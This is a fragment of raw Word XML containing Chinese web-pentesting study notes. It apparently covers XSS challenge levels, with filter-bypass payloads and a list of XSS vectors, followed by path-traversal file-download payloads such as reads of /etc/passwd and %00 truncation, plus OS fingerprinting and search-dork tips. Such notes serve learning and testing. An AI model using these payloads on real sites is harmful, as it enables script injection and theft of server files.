          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251663360" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="589AB55D" wp14:editId="422C9903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4514850" cy="6096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A2F63" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="17789F37" w14:textId="77777777" w:rsidR="00456CC1" w:rsidRDefault="00456CC1"/>
    <w:p w14:paraId="0980C7F1" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w14:paraId="2C831C8D" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w14:paraId="3CEB294F" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w14:paraId="249C9E9B" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>5</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">:  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>绕过了on和script</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="277D7128" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRPr="00C804F3" w:rsidRDefault="00C804F3" w:rsidP="00C804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“</w:t>
      </w:r>
      <w:r w:rsidRPr="00C804F3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt; &lt;a href=</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00C804F3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>javascript:alert(1)</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>’</w:t>
      </w:r>
      <w:r w:rsidRPr="00C804F3">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="126AE500" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w14:paraId="29DFDFD5" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00A448A4">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251667456" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43F6D4F7" wp14:editId="6F54EF81">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:align>left</wp:align>
            </wp:positionH>
            <wp:positionV relativeFrom="paragraph">
              <wp:posOffset>24669</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="4695825" cy="485775"/>
            <wp:effectExtent l="0" t="0" r="9525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AB604" w14:textId="77777777" w:rsidR="00C804F3" w:rsidRDefault="00C804F3"/>
    <w:p w14:paraId="26455D72" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w14:paraId="4E1E9569" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w14:paraId="0656C36D" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>6：</w:t>
      </w:r>
      <w:r>
        <w:t>过滤了&lt;script、on、src、data、href标签</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4993DDC0" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4">
      <w:r>
        <w:t>但是替换之前没有转化为小写字母，所以可以用大小写绕过</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48AEEE95" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRPr="00CB3A3A" w:rsidRDefault="00A448A4" w:rsidP="00A448A4">
      <w:pPr>
        <w:widowControl/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1"/>
        <w:outlineLvl w:val="1"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>"&gt;&lt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>SC</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ript&gt;alert('hack')&lt;/s</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>CR</w:t>
      </w:r>
      <w:r w:rsidRPr="00CB3A3A">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>ipt&gt;&lt;"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A03B02E" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w14:paraId="7A8ABDAF" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4" w:rsidP="00A448A4">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>"&gt;&lt;img Src="1.jpg" Onerror="alert(1)"&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="379BCED9" w14:textId="77777777" w:rsidR="00A448A4" w:rsidRDefault="00A448A4"/>
    <w:p w14:paraId="6F5B2070" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w14:paraId="15F85F14" w14:textId="77777777" w:rsidR="000D5101" w:rsidRPr="000D5101" w:rsidRDefault="000D5101" w:rsidP="000D510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7：</w:t>
      </w:r>
      <w:r w:rsidRPr="000D5101">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>过滤了script、on、src、data、href，并且在过滤前将keyword转换为了小写</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74643570" w14:textId="77777777" w:rsidR="000D5101" w:rsidRPr="000D5101" w:rsidRDefault="000D5101" w:rsidP="000D510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5101">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>第二处引用keyword没有编码，可以闭合input标签后，重写关键字绕过过滤</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43630C36" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101" w:rsidP="000D5101">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">        </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>"&gt;&lt;scrscriptipt&gt;alert(1)&lt;/scrscriptipt&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49D85DA4" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w14:paraId="0C8D373F" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w14:paraId="208D171F" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D510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8：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FBCD2AE" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101">
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="287517A8" wp14:editId="2F19622C">
            <wp:extent cx="5274310" cy="1677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5EB" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101" w:rsidP="000D5101">
      <w:pPr>
        <w:pStyle w:val="HTML"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="HTML1"/>
        </w:rPr>
        <w:t>javascrip&amp;#116;:alert(1)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="044C0A1E" w14:textId="77777777" w:rsidR="000D5101" w:rsidRDefault="000D5101"/>
    <w:p w14:paraId="742CCA08" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B"/>
    <w:p w14:paraId="754F8A64" w14:textId="77777777" w:rsidR="0038154F" w:rsidRDefault="0038154F"/>
    <w:p w14:paraId="077D1757" w14:textId="339CD16F" w:rsidR="0038154F" w:rsidRDefault="00280AA9">
      <w:r w:rsidRPr="00280AA9">
        <w:t>https://mp.weixin.qq.com/s/EOPCstDYmFVtaLYNcUQLzA</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64F52591" w14:textId="77777777" w:rsidR="0038154F" w:rsidRDefault="0038154F"/>
    <w:p w14:paraId="2BAF1806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拿出较为好用的payload</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77396AAE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details/open/ontoggle=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70BE8081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svg/onload=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5754D943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img/src/onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1FB7AE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video/src/onerror=alert(1)&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D66DF7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script&gt;(alert)(1)&lt;/script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6145A253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video&gt;&lt;sourceonerror=”javascript:alert(1)”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47714542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video/src/onloadstart=”alert(1)”&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F7ADF86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ahref=javascript:alert(1)&gt;222&lt;/a&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07DDFCC3" w14:textId="77777777" w:rsidR="0038154F" w:rsidRDefault="0038154F"/>
    <w:p w14:paraId="6A367996" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B"/>
    <w:p w14:paraId="46E36AE6" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B"/>
    <w:p w14:paraId="1D88D99D" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>任意文件下载</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261130A2" w14:textId="77777777" w:rsidR="00D75791" w:rsidRDefault="00BB3AB0" w:rsidP="00D75791">
      <w:hyperlink r:id="rId87" w:history="1">
        <w:r w:rsidR="00D75791">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://www.cnblogs.com/zhaijiahui/p/8459661.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7C836D19" w14:textId="77777777" w:rsidR="002D6C60" w:rsidRDefault="00BB3AB0" w:rsidP="00D75791">
      <w:hyperlink r:id="rId88" w:history="1">
        <w:r w:rsidR="002D6C60">
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>https://xz.aliyun.com/t/6594</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="58FD4567" w14:textId="77777777" w:rsidR="00D75791" w:rsidRDefault="00D75791" w:rsidP="00D75791"/>
    <w:p w14:paraId="075C5ADC" w14:textId="77777777"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:”readfile.php?file</w:t>
      </w:r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14:paraId="7D16669C" w14:textId="77777777"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:”read.php?filename</w:t>
      </w:r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14:paraId="5F6B73D1" w14:textId="77777777"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:”download.php?file</w:t>
      </w:r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14:paraId="38471096" w14:textId="77777777"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:”down.php?file</w:t>
      </w:r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14:paraId="19542768" w14:textId="77777777" w:rsidR="002D6C60" w:rsidRPr="002D6C60" w:rsidRDefault="002D6C60" w:rsidP="00D75791"/>
    <w:p w14:paraId="4C787D3F" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>• Index.php?f=../../../../../../../../etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4569CA21" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>• Index.php?f=../index.php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="067C3194" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>• Index.php?f=file:///etc/passwd</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6586A938" w14:textId="77777777" w:rsidR="003719B2" w:rsidRDefault="003719B2" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ath</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A16BADB" w14:textId="77777777" w:rsidR="003719B2" w:rsidRPr="003719B2" w:rsidRDefault="003719B2" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>url</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550B6AE1" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如果自动加上后缀的话，用%00截断</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32101560" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>参数f的参数值为PHP文件时：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E10E356" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>      1.文件被解析，则是文件包含漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EE1D74" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>      2.显示源代码，则是文件查看漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41ECC25B" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00D7298B" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>      3.提示下载，则是文件下载漏洞</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E90762" w14:textId="77777777" w:rsidR="00907A06" w:rsidRDefault="00907A06" w:rsidP="00D7298B">
      <w:pPr>
        <w:pStyle w:val="a3"/>
      </w:pPr>
      <w:r>
        <w:t>P</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>ing判断系统</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30CD0AC7" w14:textId="77777777" w:rsidR="00D7298B" w:rsidRDefault="00907A06" w:rsidP="00D7298B">
      <w:r>
        <w:t xml:space="preserve">UNIX 及类 UNIX </w:t>
      </w:r>
      <w:hyperlink r:id="rId89" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>操作系统</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> ICMP 回显应答的 TTL 字段值为 255</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>Compaq Tru64 5.0 ICMP 回显应答的 TTL 字段值为 64</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">微软 </w:t>
      </w:r>
      <w:hyperlink r:id="rId90" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>Windows</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> NT/</w:t>
      </w:r>
      <w:hyperlink r:id="rId91" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>2K</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t>操作系统 ICMP 回显应答的 TTL 字段值为 128</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">微软 Windows </w:t>
      </w:r>
      <w:hyperlink r:id="rId92" w:tgtFrame="_blank" w:history="1">
        <w:r>
          <w:rPr>
            <w:rStyle w:val="a4"/>
          </w:rPr>
          <w:t>95</w:t>
        </w:r>
      </w:hyperlink>
      <w:r>
        <w:t xml:space="preserve"> 操作系统 ICMP 回显应答的 TTL 字段值为 32</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45233568" w14:textId="77777777" w:rsidR="001815CA" w:rsidRDefault="001815CA" w:rsidP="00D7298B"/>
    <w:p w14:paraId="72C4AAB3" w14:textId="77777777" w:rsidR="001815CA" w:rsidRDefault="001815CA" w:rsidP="00D7298B"/>
    <w:p w14:paraId="7DD57FA6" w14:textId="77777777" w:rsidR="001815CA" w:rsidRDefault="001815CA" w:rsidP="00D7298B">
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>Google</w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00CA2DA4">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t xml:space="preserve">搜索 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>site：*.baidu</w:t>
      </w:r>
      <w:r>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>com</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">  </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>login</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="028EEF6E" w14:textId="77777777" w:rsidR="00CA2DA4" w:rsidRDefault="00CA2DA4" w:rsidP="00D7298B"/>
    <w:p w14:paraId="408406A2" w14:textId="77777777" w:rsidR="003439C6" w:rsidRDefault="003439C6" w:rsidP="003439C6">
      <w:r w:rsidRPr="003439C6">
        <w:t>intitle</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>：搜索网页标题中包含有特定字符的网页。例如输入“</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>intitle: mst”</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，这样网页标题中带有</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>mst</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的网页都会被搜索出来。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>inurl</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>：搜索包含有特定字符的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>。例如输入“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>inurl:mst”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>，则可以找到带有</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>mst</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>字符的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>intext:</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索网页正文内容中的指定字符，例如输入“</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>intext:mst”</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。这个</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>语法</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>类似我们平时在某些网站中使用的“文章内容搜索”功能。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>filetype:</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>搜索指定类型的文件。例如输入“</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>filetype:mst”</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>，将返回所有以</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>mst</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>结尾的文件</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>site</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>：找到与指定网站有联系的</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>URL</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>。例如输入“</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>Site:mst.hi-ourlife.com”</w:t>
      </w:r>
      <w:r w:rsidRPr="005A3EC1">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:color w:val="C45911" w:themeColor="accent2" w:themeShade="BF"/>
        </w:rPr>
        <w:t>。所有和这个网站有</w:t>
      </w:r>
      <w:r w:rsidRPr="003439C6">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>联系的</w:t>
      </w:r>
